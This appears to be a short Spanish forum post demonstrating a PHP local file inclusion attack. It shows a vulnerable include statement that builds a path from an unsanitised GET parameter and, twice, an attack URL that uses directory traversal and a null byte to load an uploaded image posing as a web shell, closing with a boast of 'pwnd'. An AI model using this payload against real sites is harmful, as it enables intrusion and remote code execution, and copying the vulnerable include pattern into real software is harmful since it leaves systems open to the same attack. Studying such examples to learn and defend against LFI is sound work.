he visto casos que hacen esto:
index.php?pagina=../../imagenes/shell_lfi.jpg%00
Código
y no es chiste xD
<?php if($_GET['pagina']) include('inclusiones/'.$_GET['pagina'].'.php'); ?>
index.php?pagina=../../imagenes/shell_lfi.jpg%00
pnwd XD